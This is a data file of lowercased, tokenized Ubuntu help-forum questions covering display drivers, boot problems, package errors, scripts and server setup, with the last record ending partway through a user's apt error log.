294561	ubuntu 13.04 monitor & resolution issues on older nvidia card	when i do a fresh install of ubuntu 13.04 on a computer with an older nvidia quadro fx 500 128mb agp card , i can not get the display to work . there are a number of things that happen : on some fresh installs the screen goes completely yellow . after other fresh installs the screen goes completely black . i have tried to install the nvidia drivers titled : current , current-updates , and nouveau . when i install one of these drivers , the desktop becomes visible with a 640x480 resolution and no unity . i can right-click on the background and navigate up to the settings , where i see the display settings only recognize the monitor as `` laptop '' and stay stuck in that one resolution option . the farthest i have gotten is using this answer which allowed me to see the entire desktop at the proper resolution , but no unity launcher or top panel . upon restart the resolution reverts back to 1280x1024 , which does not conform to the monitor ( leaves about 3 inches of blank space on either side of the image ) and unity is still not present . ? ? ? ? ? ? ? ? ? ? ? which is the proper driver for an older nvidia card ? how do i restart unity so that appears again ? what is the display setup process once i have done a fresh install ( since it is not auto-detecting ) ? many thanks
294574	unencrypting a hard drive	i 've mistankenly checked the 'encrypting hard drive ' box during installation of 13.04 . as a result every time i turn the laptop on , it asks for a password before i get to the users login screen . i would like to get rid of that first password and as it turned out i will have to revert the encryption of the hard drive . can that be done ?
294575	how to fix a font error ?	the screenshot looks like : it happens on firefox as well as chromium .
294580	start-up problem on 13.04	i 'm using ubuntu 13.04 on an acer v3-571 this has happened to me a few times . the pc stays irresponsive for about a minute and i have no opcion but to unplug it and beg for it to start correctly next time . any clues ? any suggestion on how to act when that happens ? thank you very much !
294581	what 's the difference between `hostname` and `uname -n`	on my server , these both return the host name : $ ubuntu @ mt-solo : ~ $ uname -n myserver $ ubuntu @ mt-solo : ~ $ hostname myserver is this always the case ?
294586	will any programs be removed from my current install if i switch to ubuntu ?	i really want to switch from windows 7 home premium to ubuntu , but i need to know if my programs i currently have installed on my laptop will be removed . thanks
294587	is it safe to install virtual box in ubuntu ?	is it safe ( for the system ) to install virtual box in ubuntu ? are there relevant disadvantages and advantages ?
294588	no boot option . enter bios directly	i made an image of my ubuntu , then i tried to install again in my laptop . but , there was n't booting from usb , then i disabled all boot options , except usb . but it did not work . when i went to enable all boot options again , they are all `` gone '' . in bios , boot options tab , there is nothing ( no cd , no hd ... ) . and when i turn on the computer , it enters directly in bios ( without pressing any button ) . i already tried to restore the default bios options and remove cmos battery , but the problem persist . anyone have seen such problem ?
294594	running hadoop on ubuntu 12.04 lts server ?	what will be the minimum system requirements if i wish to run it on the server version of ubuntu 12.04 lts . currently i have 4gb of ram , core 2 duo processor t5550 , 1.83 ghz . the server installation is 64 bit .
294595	any tool that displays cpu core utilization ?	i like the way system monitor on ubuntu displays the usage of different cores on the cpu . i write multi-threaded applications and it is useful for me to see how many cores are being occupied , for how long and with how much utilization . all of this information is neatly summarized by the cpu utilization in system monitor . now , the problem is system monitor itself takes a lot of resources to run . for example , it takes 16-25 % of a core when i 'm running it . is there an alternative to system monitor that utilizes lesser cpu and has cpu visualization that shows utilization of all individual cores ?
294598	how to batch rename files ( .jpg ) randomly ?	ok , so i have a digital photo frame that i have , and view my photos from a usb . everything works fine , however , there is no way to display the pictures randomly . so , i have to watch my pictures in order , which is fine but not really what i want . i am wondering if there is a way to have my .jpg pictures , that i view to be batch renamed , but renamed randomly ? be it adding random characters to the start of the name or replacing the characters before .jpg thank you for your time and answers .
294602	13.04 not detecting wi-fi connection	using ubuntu 13.04 . i have updated and upgraded all the drivers right after installation . still i ca n't see the wifi connections detected even when i can see them in windows 8 from the same notebook . please help .
294605	help installing ubuntu 12.04.2 dvd in windows 8	i downloaded the 12.04.2 desktop amd64 iso from the main website . then i burned it onto a dvd , but when i restart , the computer wo n't recognize the dvd when it boots . [ ] have i downloaded the wrong one as there is wubi on the dvd ?
294607	accessing plex and transmission remotely	i have setup plex and transmission to be accessed through the webui . my question is how can i let friends access these features from an entirely separate location ?
294619	`` please run 'make modules_prepare ' '' issue when installing ndiswrapper	my router went down , so i have a temporary one installed right now that has no wifi . i decided to pick up a usb wifi dongle , and i want to use my ubuntu server as the bridge . i have the driver installed , and was following the guide for setting up ndiswrapper on the ubuntu community manual . when i run ndiswrapper -l : rt2870 : driver installed device ( 0846:9012 ) present ... so i assume that it is installed . i then run depmod -a and get no output ( assuming it works correctly ) , and then modprobe ndiswrapper ... but that returns fatal : module ndiswrapper not found . this error seems weird to me , but i 'll bite . i google the issue further , and find some people telling me to install 1.58 from the ndiswrapper website on sourceforge . i try to run make in the extracted folder , but get this error : makefile:41 : *** please run 'make modules_prepare ' in /usr/src/linux-headers-3.5.0-17 . stop . still not working ! but why did the previous ndiswrapper commands work ? the output of ndiswrapper -v shows that it 's ( mostly ) installed : error : module ndiswrapper not found . module version is too old ! utils version : '1.9 ' , utils version needed by module : '0' module details : error : module ndiswrapper not found . you may need to upgrade driver and/or utils to latest versions available at http : //ndiswrapper.sourceforge.net this is getting very irritating , but i do n't know where to go from here . when i run uname -r , i get 3.5.0-23-generic , if that helps any ( a lot of scripts are asking for it )
294622	low brightness : ubuntu 13.04	i recently dual booted my windows 8 with ubuntu 13.04 . the first thing that came to my notice was that the brightness was too low . i increased the brightness to maximum from system settings , but still , it remains low . i did not face any such issue with ubuntu 12.10 that i had earlier . graphics card : ati radeon 7730m laptop model : dell inspiron 15r turbo so , is there a way to increase the brightness to the actual maximum ?
294625	bootloader help	i am new to linux . i am sure if i searched enough i could figure this out but , i keep running into the same issue . i have just recently installed ubuntu 12.04 lts . i unfortunately have only one computer in working order in my household . my computer has three 500gb hard drives , and i have a different os installed on each hard drive : windows xp , windows 8 and ubuntu 12.04 . i am asking how do i load a boot menu screen immediately after post automatically . i have found resources to do this from a live usb , but i 'm looking for an easy way to select my operating system from a boot menu .
294630	how to install warzone 2100 ver3.1game from tar.gz file	i tried ./configure but resulted in error : '' checking for glew ... configure : error : package requirements ( glew > = 1.5.2 ) were not met : no package 'glew ' found consider adjusting the pkg_config_path environment variable if you installed software in a non-standard prefix . alternatively , you may set the environment variables glew_cflags and glew_libs to avoid the need to call pkg-config . see the pkg-config man page for more details . '' pls help i have got libglew already installed
294631	do handhalds work just as game pads/ controllers do ?	i am trying to figure out if i could use a handheld game console to control ubuntu 13.04 just like an actual controller would . it may sound stupid , but i am just asking because it may be possible in some way some how .
294634	no sign of a dual boot after installation	i tried to install ubuntu 13.04 alongside windows 7..everything went well , and it said that i had to restart the system . i restarted & took out the usb , but it booted directly to windows 7 . i tried the installation again , but apparently ubuntu was properly installed in the first time itself ... re installing does n't work . i had left about 78 gb worth of free space on my hard drive . when i checked the control panel for the disk partitions , it had two separate allocations for the 78 gb..one as 70 gb and the other as 8 gb . neither of the two partitions were shown as free space , but rather as healthy primary partitions . what do i do ?
294635	change gsetting with script on logout	system : ubuntu raring ringtail ( 13.04 ) from fresh installation . purpose : main : change gsetting ( desktop wallpaper ) with script on user logout . what 's i 've done : ( carefully read ) i try to stop an application named variety ( this one ) on logout that i 've put my workarounds inside . variety is an autostart app , so it just started everytime i 'm logging in . variety has a function on_quit ( ) and force_quit_thread ( ) that are called when the app process stopped . so , i added my python script line inside , that execute my real script ( normalize ) . when i tried to quit variety normally , it does what i want ! i though , when the system log me out , any process that i started should also be stopped . but then , i realized , it is not . so , i could n't use this way . this let me thing to use another way to kill variety process manually when i logging out . i have tried ~/.bash_logout ( i doubt it , because i know autostart does not run on bash ) ; ~/etc/gdm/postsession/default ( but , i 'm not use gdm ) ; ~/etc/lightdm/lightdm.conf ( this one does n't work either ! how come ? ) ; pam_script / pam-script ( i do n't know how to work with it . really different . ) happened : but , the problem comes when i try to log out my account . it neither execute on_quit ( ) nor force_quit_thread ( ) . and the log i captured from ~/nohup.out see last line , here you are : ... . bla-bla ... [ only see last line ] ioerror : [ errno socket error ] [ errno 2 ] no such file or directory ( variety:15627 ) : gdk-warning ** : variety : fatal io error 11 ( resource temporarily unavailable ) on x server :0 . they lost available resources , right ? not quit-ed normally then and means , gsetting not changed . details 1 ) added script inside quit functions it is on /opt/extras.ubuntu.com/variety/variety/varietywindow.py : < pre > bashcommand = `` /home/abdillah/toolbox/command/normalize '' os.system ( bashcommand ) < /pre > 2 ) script inside normalize purpose : changing wallpaper when variety quit . < pre > echo $ ( cat `` $ { home } '' /.self-log ) '' | normalize '' > `` $ { home } '' /.self-log # append log wallpaper= $ ( cat /home/abdillah/.wallpaper ) filename= '' file : // '' $ wallpaper configname= $ { filename/ ' # '/ '' % 23 '' } gsettings set org.gnome.desktop.background picture-uri $ configname # the most important < /pre > 3 ) lightdm config file the one that make me confuse is that in it 's documentation , there is n't a statement mentioned session-cleanup-script . it is deprecated ? [ seatdefaults ] user-session=ubuntu greeter-session=unity-greeter autologin-user= session-cleanup-script=/home/abdillah/toolbox/command/logoff 4 ) logoff file contains : .self-log file still empty = > fail # ! /bin/bash echo $ ( cat `` $ { home } '' /.self-log ) '' |fail ? ( onscript ) '' > `` $ { home } '' /.self-log # append log killall variety /opt/extras.ubuntu.com/variety/bin/variety -q echo $ ( cat `` $ { home } '' /.self-log ) '' |success ? ( onscript ) '' > `` $ { home } '' /.self-log # log exit 0 question when anyone think , above condition is very specific , just answer the following question . 1 . how to executing script directly on logout ( cmiw the ways above . if not , any suggestion please ) or 2 . how i can stop variety properly when i logged out ? ( so on_quit ( ) called ) possible solution start variety with [ startupapplication ] in bash and use ~/.bash_logout script to stop . but how ? ok. its long . but , i try to make as clear as possible . because out there , there are lots of question related with this that i 've read . really need anybody help . thank you .
294643	to control battery at a certain capacity ( for ex.20 % ) then the laptop will be automatically standby or hibernate for long-lasting the battery	i would like to control for setting my battery at a certain capacity ( for ex.20 % ) then the laptop will be automatically standby or hibernate for long-lasting the battery . is there any solution , please ? be noted : my vostrol 3450 , ubuntu 13.04 , hibernate function is already rehabilitated . the battery capacity i can find is in the file capacity as below : /sys/devices/lnxsystm:00/lnxsybus:00/pnp0c0a:00/power_supply/bat0/capacity i created the bash script : ! /bin/bash load= $ ( cat /sys/devices/lnxsystm:00/lnxsybus:00/pnp0c0a:00/power_supply/bat0/capacity ) min_load=20 if [ $ load < = min_load ] ; then pm-suspend fi on terminal , i perform the cli for test : `` sudo /bin/battery-suspend '' then the result failed showing : `` /bin/battery-suspend : line 5 : = : no such file or directory ''
294646	how to make everything on stdout be read aloud ( using espeak ) ?	i 've got the espeak tts system up and running , and i like it quite a bit . i 'm wondering , is there a way to pipe everything that gets printed to stdout to espeak ? i 'm trying to set up a system without a monitor that would speak the terminal output to me . i 've found the brltty-espeak package , but i have no idea how to set it up .
294648	install latest version of unity in ubuntu 12.04	is there anyway i can install the latest unity ( used in ubuntu 13.04 ) in ubuntu 12.04 ? i do not want to upgrade my super stable 12.04 just to get the unity .
294650	what is this python script doing ?	what i need is an executable file ( so that i can double click and open ) of deluge bit torrent client . i found this , deluge.py is my usr/bin folder . # ! /usr/bin/python # easy-install-entry-script : 'deluge==1.3.5 ' , 'gui_scripts ' , 'deluge' __requires__ = 'deluge==1.3.5' import sys from pkg_resources import load_entry_point if __name__ == '__main__ ' : sys.exit ( load_entry_point ( 'deluge==1.3.5 ' , 'gui_scripts ' , 'deluge ' ) ( ) ) i need such a file or command to enter in `` task schedule '' program to open it on a schedule . so will this script serve the purpose . can i use some other method ?
294651	step by step guide to install aircrack-ng suite on ubuntu 12.04 lts	i tried soo many guides and soo many things i browsed like the whole world wide web and i could not install aircrack-ng suite . any help would be appreciated : ) thank you all , best regards .
294658	how to uninstall any other os without uninstalling lubuntu	i have installed 2 os on my computer . linux mint and lubuntu 13.04 ( no windows ) now how do i uninstall linux mint ? keeping in mind i 've no windows os so no bootloader issue i guess .
294663	ubuntu 13.04 ram and cpu maximum support ?	i 'm learning about ubuntu , but i do not know the ubuntu 13.04 ram and cpu support up to how much ? ? ? hope you help me
294671	are there any ways to install awesome 3.5.1 on ubuntu 12.04 ?	i 'm doing to migrate from de to wm , and like awesome . but at home i use ubuntu 13.04 and can install the newest awesome . at work i use ubuntu 12.04 and it is older then awesome , so how can i install the newest awesome and all it dependencies on ubuntu 12.04 ?
294672	removing apparmor	i have mysql installed in my development machine , where i just do n't need any additional security measure . i want to move mysql data files to another partition , which implies a lot of change in appamor config , that i do n't want to do since it 's too much work for a simple development machine and i really do n't need it . my question is : is it safe to remove apparmor without any side-effects to the system ? like i said , security in this case is not really a concern .
294673	ubuntu 12.04 lts freezes on sony vaio sve1513q1es	i have this new pc sony ( in title ) and i installed ubuntu 12.04 . i 'm using kernel 3.2.0-41-generic-pae ( i installed 32 bit version even if my pc is 64 bit because there were some errors during the installation if i tried 64 bit one ) . the problem is that sometimes the pc freezed completely , i ca n't even do ctrl+alt+f1 ... i have to perform sudo iwconfig wlan0 power off thinking that it was a problem of the wifi device ( i had the same problem on another pc with kernel panic caused by the wifi adaprted and that command worked ) .. still no results . i have installed linux backported drivers wireless but nothing . how can i solve this ? maybe some problems in grub ? thank you so much
294682	windows compatible games on ubuntu 13.04	chess planet ( ru ) installed through wine on ubuntu 13.04 . the desktop shortcut says invalid encoding.double click does not open the game .
294688	dpkg wo n't update - input/output error in indicator-session	i have been having an error trying to update my system . currently i ca n't install/remove or update anything with apt-get ... here is the error i get when running apt-get update dpkg : unrecoverable fatal error , aborting : reading files list for package 'indicator-session ' : input/output error e : sub-process /usr/bin/dpkg returned an error code ( 2 )
294690	issue installing ubuntu on hp mini 2133	i am trying to install ubuntu ( and lubuntu ) 13.04 on a hp mini 2133 , and when i boot from the usb disk i get the folloring messages : udevd [ 99 ] : timeout : killing '/sbin/modprobe -bv pci : v00001106d00005372sv000103csd00003030bc01sc01i8f ' [ 224 ] the number in the square brackets vary every time i try to boot from the live usb installer . after a lot of those lines and some other messages in the end , the loading screen shows ( the screen with four dots blinking ) , but it stays for a long time , and then the screen just turns black . any idea what this can be caused by ?
294703	question about purging nvidia driver	does purging nvidia driver on ubuntu also purges the driver from the windows ? i 'm using a dual-boot in my system and i do n't know if it will affect the other os or not . thanks for the reply .
294710	how to install the following theme on ubuntu 13.04	i wanted to install the following theme ( http : //gnome-look.org/content/show.php ? action=content & content=155582 ) and tried to do it like this ( how can i install themes ? ) , however , there 's no .deb file in the archive for step 3 . how can i install it now ?
294720	what wo n't mysql start ?	mysql will not start , and i need some help to figure out why . $ download mysql-common [ sudo ] password for zero : reading package lists ... done building dependency tree reading state information ... done mysql-common is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 2 not fully installed or removed . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y setting up mysql-server-5.5 ( 5.5.31-0ubuntu0.13.04.1 ) ... start : job failed to start invoke-rc.d : initscript mysql , action `` start '' failed . dpkg : error processing mysql-server-5.5 ( -- configure ) : subprocess installed post-installation script returned error exit status 1 e : sub-process /usr/bin/dpkg returned an error code ( 1 ) setting up libmysqlclient18 : amd64 ( 5.5.31-0ubuntu0.13.04.1 ) ... setting up libdbd-mysql-perl ( 4.021-1 ) ... setting up mysql-client-5.5 ( 5.5.31-0ubuntu0.13.04.1 ) ... setting up mysql-server-5.5 ( 5.5.31-0ubuntu0.13.04.1 ) ... start : job failed to start invoke-rc.d : initscript mysql , action `` start '' failed . dpkg : error processing mysql-server-5.5 ( -- configure ) : subprocess installed post-installation script returned error exit status 1 no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of mysql-server : mysql-server depends on mysql-server-5.5 ; however : package mysql-server-5.5 is not configured yet . dpkg : error processing mysql-server ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already processing triggers for libc-bin ... ldconfig deferred processing now taking place processing triggers for ureadahead ... errors were encountered while processing : mysql-server-5.5 mysql-server
294723	how to get rif of gpu hangups ?	my ubuntu os shows always gpu hangup i dont know to slove this ? ? ? can anybody help me ? ? i am using ubuntu 12.10 os . my computer configuration is i5 and 4gb ram .
294725	how do i install an xbee ? i am trying to do it with ruby	download the ruby-xbee tarball from here . extracted the bundle into its permanent directory : cd to /ruby*pcc did $ ln -s ruby-serial-port-0.6-linux-intel ruby-serialport-0.6 $ ruby extconf.rb worked ok. made a makefile $ make multiple errors in serial.c did not get to $ make install i tried these things gedit serialport.c change # include < rubyio.h > to # include < ruby/io.h > sudo gem install serialport
294731	my computer does n't recognize the following library : linux/config.h when compiling	i have code written in c and i have included some libraries such as linux/config.h and linux/kernel.h . whenever i compile the file , it gives me an error saying no such file or directory ? is there a certain program i should install first ? how can i solve this error ?
294732	is there a difference between `` apt-get install kdm '' and `` apt-get install kubuntu-desktop '' ?	my question 's title is pretty straightforward . is there a difference between installing kde with the command `` apt-get install kdm '' or `` apt-get install kubuntu-desktop '' ? i 'm installing penguy os on a virtual drive on my macbook pro , and i understand it is based on ubuntu . i already know that i like kde more than the alternative desktops available . i just want to know which command to type once the installation finishes in order to get kde on there . and just in case it 's questioned , i downloaded kubuntu but it did not get along with virtualbox which is why i 'm going for penguy . many thanks !
294733	how does user access for full disk encryption work ?	when installing ubuntu 12.10 and higher you get an option to encrypt the entire drive ( not just the home directory ) . what encryption mechanism is used for this , and what kind of access permissions are supported ?
294736	run a shell script as another user that has no password	i would like to run a script from the main ubuntu shell as a different user that has no password . i have full sudo priviledges , so i tried this : sudo su -c `` your command right here '' -s /bin/sh otheruser then i have to enter my password , but i am not sure if that script is now really called under that user . how can i affirm that the script is really running under that user now ?
294737	how to report bug in french	sometimes , i see bugs when i use ubuntu , and i would like to report them , but my english is too bad , so i would like to report them in french . is there anyway to do this ?
294738	gnome 3.8.1 missing entries in settings	so i installed ubuntu 13.04 gnome and updated gnome-shell to 3.8 . current version is 3.8.1 . i decided to edit what applications show in the lock screen when , to my amazement , no privacy entry appears in the settings area . what can i do ?
294739	laptop reboot when i want to shut down	i 'm using a lenovo thinkpad edge e130 with ubuntu 13.04 . i do n't know why , but when i try to shut down my laptop , it happens really often that the computer restarts . does someone has the same issue ?
294742	will my system remain safe , if i run ubuntu ( through vmware ) on windows - for virus purposes ?	i want to use both windows & ubuntu , but i mostly work in windows & that i use ubuntu only for virus purposes ( virus-free ) . by doing as mentioned above , will it be effective in removing the virus & that i do n't want the virus to effect my windows files when i am running ubuntu from windows . will it work in the similar manner as that in the case of booting seprately ubuntu from restart .
294745	only wallpaper shows after install 13.04	after i succesfully installed ubuntu 13.04 . after i log in i get a blank screen only showing me the wallpaper and a mouse which i can move ( so it did n't freeze . i installed ubuntu 13.04 from my usb with the pendrive installer as explained on the official website . i installed ubuntu over windows .
294746	setting up raid during 13.04 install	i am attempting to install ubuntu 13.04 desktop on raid 5 , but i ca n't figure out how to do it . i have read that it can be done during the install , though i have n't found a good explanation of how it is done . i saw something about using lvm and the 'physical volume for raid ' options , but i ca n't find the 'physical volume for raid ' in the list of options for the new partition . i found this installation guide , but none of the raid options can be found . does anyone have a screen shot or something that might help me ? thanks in advance !
294751	windows 8 legacy bios mode and ubuntu 12.04 lts dual boot	i have fresh installed windows 8 on my laptop and i want to dual boot it with ubuntu 12.04 lts ( 64 bit ) . my bios mode is legacy . i want to know is their any issues with dual booting , i just want to know before preceding to install ubuntu .
294753	php-in-homedirs	i am trying to get php to work in user 's public_html folder using the instructions found at : https : //wiki.ubuntu.com/userdirectoryphp if i follow the first part and comment out the ifmodule lines in php5.conf it works fine . however if i try the second part by creating a php-in-homedirs.conf file it does not work . i have followed the instructions to the letter , multiple times , and i have never got it to work . is there something missing from the instructions , or does php-in-homedirs.conf just not work ?
294755	slow network speeds ga511 ( rtl-8169 ) 1gbit adapter	i having troubles with the upload and download speed of my pc card network adapter . the upload speed is around 3.5-4 mb/s and the download is 30mb/s with the r8169 6.017.00 driver from realtek . i have upgraded the kernel which installed the standard linux driver again ( 2.3lk-napi ) and with this driver the speed both up and down is 13-14mb/s . i 'm connected to an 1gbit network . i have tried both copying data to my pc ( running windows 7 ) via samba and sftp ( using filezilla ) . furthermore by using a sparse file on the web server we have tested that it 's definitely the server . as the speed on the loopback adapter with the sparse file is around 250mb/s and the speed differs per driver we think it is definitely the network card . also peculiar is the ping as it equals 138ms to the router/other pcs in the local network . but this might be explained by the fact of the latency of the network card ( set at 64ms during startup.. ) . running ubuntu server 12.04.2 lts linux klootzak 3.5.0-27-generic # 46~precise1-ubuntu smp tue mar 26 19:33:56 utc 2013 i686 i686 i386 gnu/linux r8169 gigabit ethernet driver 2.3lk-napi loaded r8169 0000:07:00.0 : enabling device ( 0000 - > 0003 ) r8169 0000:07:00.0 : ( unregistered net_device ) : not pci express r8169 0000:07:00.0 : setting latency timer to 64
294756	ubuntu 13.04 : ldap invalid credentials	i 'm trying to follow the ubuntu official openldapserver guide with no success . when i tried to log into the server it says ( https : //help.ubuntu.com/12.10/serverguide/openldap-server.html # openldap-server-populate ) : root @ dexter : ~ # ldapadd -x -d cn=admin , dc=example , dc=com -w -f add_content.ldif enter ldap password : ldap_bind : invalid credentials ( 49 ) also when i try to get the dc=example , dc=com dit : root @ dexter : ~ # ldapsearch -x -lll -h ldap : /// -b dc=example , dc=com dn no such object ( 32 ) any ideas ? i 've reinstalled the service three times and i 'm completly sur that the password is fine .
294760	nautilus in ubuntu 13.04 lost the shortcut key for jumping to list view	in the version of nautilus included with ubuntu 12.10 , you could press ctrl+2 to switch to file list view , instead of the default grid view . after upgrading to ubuntu 13.04 this feature does n't seem to be available . is there a new shortcut key , or a way to bring this capability back ?
294761	qtcreator wont start anymore . symbol lookup error	since yesterday i 'm unable to start qtcreator . trying to start qtcreator from terminal gives me this error message , which i have n't found anything on : qtcreator : symbol lookup error : /usr/lib/x86_64-linux-gnu/qt5/plugins/platforms/libqxcb.so : undefined symbol : _zn15qplatformwindow17formatwindowtitleerk7qstrings2_ any ideas what this is about ? running ubuntu 13.04 with qt5-edgers ppa for both ubuntu sdk and qt . version of qtcreator : 2.7.0-0ubuntu4~raring1~test5
294763	how do i remove the window borders from modal dialogs in cinnamon ?	system : ubuntu 13.04 , with cinnamon 1.8 . whenever a modal dialog like the one below ( password prompt in gdebi ) pops up , it always has an annoying border around it . is there any way to fix this ? i should mention that i installed gnome shell beforehand , but have since removed it .
294765	uefi mode problem with windows 8 on sony vaio	this is manorath . i tried all the options explained in the help page regarding uefi mode when i boot my sony vaio which already contain windows 8 in uefi mode when i am using the ubuntu cd as my first boot it is not detecting the os in the cd it is giving error like `` no os found '' . so i request you to give any solution on this problem . and also i am unable to install ubuntu inside windows 8. if it is getting installed then at the time of booting when i select the ubuntu then it is giving some memory error . plz help on this topic .
294769	removed apache2 server accidently	i did executed following command on my live server with sudo dpkg -i mod-pagespeed-*.deb apt-get -f install and it told me and now i am unable to install apache2 please help me.. > reading package lists ... done building dependency tree reading > state information ... done correcting dependencies ... done the > following packages were automatically installed and are no longer > required : libemail-send-io-perl libgd-text-perl libchart-perl > libmime-types-perl libemail-mime-encodings-perl libalgorithm-c3-perl > libgd-graph3d-perl libclass-load-perl libio-all-perl libgd-gd2-perl > libxml-parser-perl libmime-tools-perl libmath-round-perl > libemail-abstract-perl dbconfig-common libclass-c3-perl libfcgi-perl > libdatetime-timezone-perl libgd-graph-perl cvs > libparams-validate-perl libcgi-pm-perl libemail-mime-contenttype-perl > libmro-compat-perl libdatetime-perl libdatetime-locale-perl > libjs-yui libemail-messageid-perl libfilter-perl > libtemplate-plugin-gd-perl libemail-date-format-perl > libreturn-value-perl libspiffy-perl libperl5.12 libemail-mime-perl > liblist-moreutils-perl libemail-send-perl libconvert-binhex-perl > libmail-sendmail-perl perlmagick libappconfig-perl > libsys-hostname-long-perl libemail-simple-perl libclass-singleton-perl > libemail-address-perl libclass-c3-xs-perl libtemplate-perl > libc6 : i386 libgcc1 : i386 libstdc++6 : i386 gcc-4.6-base : i386 use 'apt-get > autoremove ' to remove them . the following extra packages will be > installed : gcc-4.6-base : i386 krb5-multidev libc-bin : i386 > libc-dev-bin libc6 libc6 : i386 libc6-dev libexpat1 libgcc1 : i386 > libgnutls26 libgssapi-krb5-2 libgssrpc4 libk5crypto3 > libkadm5clnt-mit8 libkadm5srv-mit8 libkrb5-3 libkrb5-dev > libkrb5support0 libssl-dev libssl1.0.0 libstdc++6 : i386 libtasn1-3 > suggested packages : krb5-doc glibc-doc glibc-doc : i386 locales : i386 > gnutls-bin krb5-user the following packages will be removed : apache2 > apache2-mpm-prefork apache2-utils apache2.2-bin apache2.2-common > bugzilla3 libapache2-mod-php5 libapr1 libaprutil1 > libaprutil1-dbd-sqlite3 libaprutil1-ldap libc-bin libcap2 > mod-pagespeed-stable : i386 the following new packages will be > installed : gcc-4.6-base : i386 libc-bin : i386 libc6 : i386 libgcc1 : i386 > libstdc++6 : i386 the following packages will be upgraded : > krb5-multidev libc-dev-bin libc6 libc6-dev libexpat1 libgnutls26 > libgssapi-krb5-2 libgssrpc4 libk5crypto3 libkadm5clnt-mit8 > libkadm5srv-mit8 libkrb5-3 libkrb5-dev libkrb5support0 libssl-dev > libssl1.0.0 libtasn1-3 warning : the following essential packages will > be removed . this should not be done unless you know exactly what you > are doing ! libc-bin 17 upgraded , 5 newly installed , 14 to remove and > 129 not upgraded . 1 not fully installed or removed . need to get 16.1 > mb of archives . after this operation , 40.7 mb disk space will be > freed . you are about to do something potentially harmful . to continue > type in the phrase 'yes , do as i say ! ' ? ] yes , do as i say ! get:1 > http : //us-east-1.ec2.archive.ubuntu.com/ubuntu/ oneiric-updates/main > libc6-dev amd64 2.13-20ubuntu5.3 [ 2590 kb ] get:2 > http : //us-east-1.ec2.archive.ubuntu.com/ubuntu/ oneiric-updates/main > libc-dev-bin amd64 2.13-20ubuntu5.3 [ 83.4 kb ] get:3 > http : //us-east-1.ec2.archive.ubuntu.com/ubuntu/ oneiric-updates/main > libc-bin i386 2.13-20ubuntu5.3 [ 938 kb ] get:4 > http : //us-east-1.ec2.archive.ubuntu.com/ubuntu/ oneiric-updates/main > libc6 amd64 2.13-20ubuntu5.3 [ 4298 kb ] get:5 > http : //us-east-1.ec2.archive.ubuntu.com/ubuntu/ oneiric-updates/main > libssl-dev amd64 1.0.0e-2ubuntu4.7 [ 1486 kb ] get:6 > http : //us-east-1.ec2.archive.ubuntu.com/ubuntu/ oneiric-updates/main > libssl1.0.0 amd64 1.0.0e-2ubuntu4.7 [ 965 kb ] get:7 > http : //us-east-1.ec2.archive.ubuntu.com/ubuntu/ oneiric/main > gcc-4.6-base i386 4.6.1-9ubuntu3 [ 16.1 kb ] get:8 > http : //us-east-1.ec2.archive.ubuntu.com/ubuntu/ oneiric/main libgcc1 > i386 1:4.6.1-9ubuntu3 [ 54.3 kb ] get:9 > http : //us-east-1.ec2.archive.ubuntu.com/ubuntu/ oneiric-updates/main > libc6 i386 2.13-20ubuntu5.3 [ 3944 kb ] get:10 > http : //us-east-1.ec2.archive.ubuntu.com/ubuntu/ oneiric/main > libstdc++6 i386 4.6.1-9ubuntu3 [ 340 kb ] get:11 > http : //us-east-1.ec2.archive.ubuntu.com/ubuntu/ oneiric-updates/main > libtasn1-3 amd64 2.9-4ubuntu0.1 [ 43.7 kb ] get:12 > http : //us-east-1.ec2.archive.ubuntu.com/ubuntu/ oneiric-updates/main > libgnutls26 amd64 2.10.5-1ubuntu3.3 [ 429 kb ] get:13 > http : //us-east-1.ec2.archive.ubuntu.com/ubuntu/ oneiric-updates/main > libkrb5-dev amd64 1.9.1+dfsg-1ubuntu2.3 [ 12.4 kb ] get:14 > http : //us-east-1.ec2.archive.ubuntu.com/ubuntu/ oneiric-updates/main > krb5-multidev amd64 1.9.1+dfsg-1ubuntu2.3 [ 89.6 kb ] get:15 > http : //us-east-1.ec2.archive.ubuntu.com/ubuntu/ oneiric-updates/main > libk5crypto3 amd64 1.9.1+dfsg-1ubuntu2.3 [ 84.2 kb ] get:16 > http : //us-east-1.ec2.archive.ubuntu.com/ubuntu/ oneiric-updates/main > libgssapi-krb5-2 amd64 1.9.1+dfsg-1ubuntu2.3 [ 118 kb ] get:17 > http : //us-east-1.ec2.archive.ubuntu.com/ubuntu/ oneiric-updates/main > libkrb5-3 amd64 1.9.1+dfsg-1ubuntu2.3 [ 351 kb ] get:18 > http : //us-east-1.ec2.archive.ubuntu.com/ubuntu/ oneiric-updates/main > libkrb5support0 amd64 1.9.1+dfsg-1ubuntu2.3 [ 24.0 kb ] get:19 > http : //us-east-1.ec2.archive.ubuntu.com/ubuntu/ oneiric-updates/main > libgssrpc4 amd64 1.9.1+dfsg-1ubuntu2.3 [ 61.1 kb ] get:20 > http : //us-east-1.ec2.archive.ubuntu.com/ubuntu/ oneiric-updates/main > libkadm5srv-mit8 amd64 1.9.1+dfsg-1ubuntu2.3 [ 53.1 kb ] get:21 > http : //us-east-1.ec2.archive.ubuntu.com/ubuntu/ oneiric-updates/main > libkadm5clnt-mit8 amd64 1.9.1+dfsg-1ubuntu2.3 [ 37.8 kb ] get:22 > http : //us-east-1.ec2.archive.ubuntu.com/ubuntu/ oneiric-updates/main > libexpat1 amd64 2.0.1-7ubuntu3.11.10.1 [ 131 kb ] fetched 16.1 mb in 2s > ( 6305 kb/s ) perl : warning : setting locale failed . perl : warning : > please check that your locale settings : language = ( unset ) , lc_all = > ( unset ) , lc_ctype = `` utf-8 '' , lang = `` en_us.utf-8 '' > are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to > default locale : no such file or directory locale : can not set lc_all to > default locale : no such file or directory preconfiguring packages ... > ( reading database ... 48629 files and directories currently > installed . ) removing mod-pagespeed-stable : i386 ... removing apache2 > ... removing libapache2-mod-php5 ... module php5 disabled . to activate > the new configuration , you need to run : service apache2 restart > removing bugzilla3 ... locale : can not set lc_ctype to default locale : > no such file or directory locale : can not set lc_all to default locale : > no such file or directory /usr/bin/locale : can not set lc_ctype to > default locale : no such file or directory /usr/bin/locale : can not set > lc_all to default locale : no such file or directory locale : can not set > lc_ctype to default locale : no such file or directory locale : can not > set lc_all to default locale : no such file or directory removing > apache2-mpm-prefork ... * 